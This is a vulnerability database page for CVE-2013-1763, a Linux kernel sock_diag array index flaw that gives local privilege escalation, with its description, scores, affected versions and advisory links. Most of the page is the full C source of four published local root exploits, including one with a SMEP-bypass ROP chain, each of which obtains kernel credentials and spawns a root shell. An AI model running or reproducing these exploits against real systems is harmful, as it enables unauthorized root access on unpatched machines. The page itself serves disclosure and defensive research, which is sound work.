CVE-2013-1763 : Detail

CVE-2013-1763

A03-Injection
0.06%V3
Local
2013-02-28
18h00 +00:00
2014-05-13
21h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 33336

Publication date : 2013-02-23 23h00 +00:00
Author : SynQ
EDB Verified : Yes

/* * quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 * bug found by Spender * poc by SynQ * * hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux * using nl_table->hash.rehash_time, index 81 * * Fedora 18 support added * * 2/2013 */ #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) kernel_code() { commit_creds(prepare_kernel_cred(0)); return -1; } int jump_payload_not_used(void *skb, void *nlh) { asm volatile ( "mov $kernel_code, %eax\n" "call *%eax\n" ); } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy, sym[512]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (!f) { return 0; } while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); if (ret == 0) { fscanf(f, "%s\n", sym); continue; } if (!strcmp(name, sym)) { printf("[+] resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char*argv[]) { int fd; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; //req.r.sdiag_family = 89; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; if(argc==1){ printf("Run: %s Fedora|Ubuntu\n",argv[0]); return 0; } else if(strcmp(argv[1],"Fedora")==0){ commit_creds = (_commit_creds) get_symbol("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); sock_diag_handlers = get_symbol("sock_diag_handlers"); nl_table = get_symbol("nl_table"); if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){ printf("some symbols are not available!\n"); exit(1); } family = (nl_table - sock_diag_handlers) / 4; printf("family=%d\n",family); req.r.sdiag_family = family; if(family>255){ printf("nl_table is too far!\n"); exit(1); } } else if(strcmp(argv[1],"Ubuntu")==0){ commit_creds = (_commit_creds) 0xc106bc60; prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0; req.r.sdiag_family = 81; } unsigned long mmap_start, mmap_size; mmap_start = 0x10000; mmap_size = 0x120000; printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } memset((void*)mmap_start, 0x90, mmap_size); char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm unsigned long *asd = &jump[4]; *asd = (unsigned long)kernel_code; memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); if ( send(fd, &req, sizeof(req), 0) < 0) { printf("bad send\n"); close(fd); return -1; } printf("uid=%d, euid=%d\n",getuid(), geteuid() ); if(!getuid()) system("/bin/sh"); }
Exploit Database EDB-ID : 24555

Publication date : 2013-02-26 23h00 +00:00
Author : sd
EDB Verified : No

// archer.c // // 2012 [email protected] // // Works reliably against x86-64 3.3-3.7 arch. // // Tested against: // // Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux // Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux // Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux // ... #include <assert.h> #define JUMP 0x0000100000001000LL #define BASE 0x380000000 #define SIZE 0x010000000 #define KSIZE 0x2000000 static long ugid; void patch_current() { int i,j,k; char *current = *(char**)(((long)&i) & (-8192)); long kbase = ((long)current)>>36; for (i=0; i<4000; i+=4) { long *p = (void *)&current[i]; int *t = (void*) p[0]; if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; for (j=0; j<20; j++) { for (k = 0; k < 8; k++) if (((int*)&ugid)[k%2] != t[j+k]) goto next; for (i = 0; i < 8; i++) t[j+i] = 0; for (i = 0; i < 10; i++) t[j+9+i] = -1; return; next:; } } } int main() { long u = getuid(); long g = getgid(); int i, f = socket(16,3,4); static int n[10] = {40,0x10014,0,0,45,-1}; assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1); setresuid(u,u,u); setresgid(g,g,g); ugid = (g<<32)|u; memcpy(1<<12, &patch_current, 1024); for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current; send(f, n, sizeof(n), 0); setuid(0); return execl("/bin/bash", "-sh", 0); }
Exploit Database EDB-ID : 24746

Publication date : 2013-03-12 23h00 +00:00
Author : Kacper Szczesniak
EDB Verified : No

#include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) x() { commit_creds(prepare_kernel_cred(0)); return -1; } char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; int main() { int fd; unsigned long mmap_start, mmap_size = 0x10000; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; /* Ubuntu 12.10 x86_64 */ req.r.sdiag_family = 0x37; commit_creds = (_commit_creds) 0xffffffff8107d180; prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410; mmap_start = 0x1a000; if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x; memset((void *)mmap_start, 0x90, mmap_size); memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1)); send(fd, &req, sizeof(req), 0); if(!getuid()) system("/bin/sh"); }
Exploit Database EDB-ID : 44299

Publication date : 2015-08-25 22h00 +00:00
Author : Vitaly Nikolenko
EDB Verified : No

/** * based on the exploit by SynQ * * Modified PoC for CVE-2013-1763 with SMEP bypass * Presentation: Practical SMEP Bypass Techniques on Linux * Vitaly Nikolenko * [email protected] * * Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux * * gcc sockdiag_smep.c -O2 -o pwn */ /** EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ **/ #include <unistd.h> #include <sys/socket.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/inet_diag.h> #include <sys/mman.h> #include <assert.h> //#include <linux/sock_diag.h> //#include <linux/unix_diag.h> //#include <linux/netlink.h> #include "sock_diag.h" #include "unix_diag.h" #include "netlink.h" unsigned long user_cs; unsigned long user_ss; unsigned long user_rflags; typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; static void saveme() { asm( "movq %%cs, %0\n" "movq %%ss, %1\n" "pushfq\n" "popq %2\n" : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory" ); } void shell(void) { if(!getuid()) system("/bin/sh"); exit(0); } static void restore() { asm volatile( "swapgs ;" "movq %0, 0x20(%%rsp)\t\n" "movq %1, 0x18(%%rsp)\t\n" "movq %2, 0x10(%%rsp)\t\n" "movq %3, 0x08(%%rsp)\t\n" "movq %4, 0x00(%%rsp)\t\n" "iretq" : : "r" (user_ss), "r" ((unsigned long)0x36000000), "r" (user_rflags), "r" (user_cs), "r" (shell) ); } int __attribute__((regparm(3))) kernel_code() { commit_creds(prepare_kernel_cred(0)); restore(); return -1; } int main(int argc, char*argv[]) { int fd; struct sock_diag_handler { __u8 family; int (*dump)(void *a, void *b); }; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } void *mapped; void *fakestruct; struct sock_diag_handler a; a.dump = (void *)0xffffffff8100b74f; commit_creds = (_commit_creds) 0xffffffff8107ee30; prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0; assert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000); memcpy(fakestruct+0xad38, &a, sizeof(a)); assert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000); unsigned long *fakestack = (unsigned long *)mapped; *fakestack ++= 0xffffffff01661ef4; int p; for (p = 0; p < 0x1000000; p++) *fakestack ++= 0xffffffff8100ad9eUL; fakestack = (unsigned long *)(mapped + 0x7000000); printf("[+] fake stack addr = %lx\n", (long unsigned)fakestack); *fakestack ++= 0xffffffff8133dc8fUL; *fakestack ++= 0x407e0; *fakestack ++= 0xffffffff810032edUL; *fakestack ++= 0xdeadbeef; *fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; req.r.sdiag_family = 45; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; saveme(); if ( send(fd, &req, sizeof(req), 0) < 0) { printf("bad send\n"); close(fd); return -1; } }

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version From (including) 3.3 To (excluding) 3.4.34

Linux>>Linux_kernel >> Version From (including) 3.5 To (excluding) 3.7.10

Linux>>Linux_kernel >> Version From (including) 3.8 To (excluding) 3.8.1

References

http://openwall.com/lists/oss-security/2013/02/25/12
Tags : mailing-list, x_refsource_MLIST
http://www.mandriva.com/security/advisories?name=MDVSA-2013:176
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.ubuntu.com/usn/USN-1750-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.exploit-db.com/exploits/33336
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.openwall.com/lists/oss-security/2013/02/24/3
Tags : mailing-list, x_refsource_MLIST
http://www.exploit-db.com/exploits/24746
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.ubuntu.com/usn/USN-1749-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.exploit-db.com/exploits/24555
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.ubuntu.com/usn/USN-1751-1
Tags : vendor-advisory, x_refsource_UBUNTU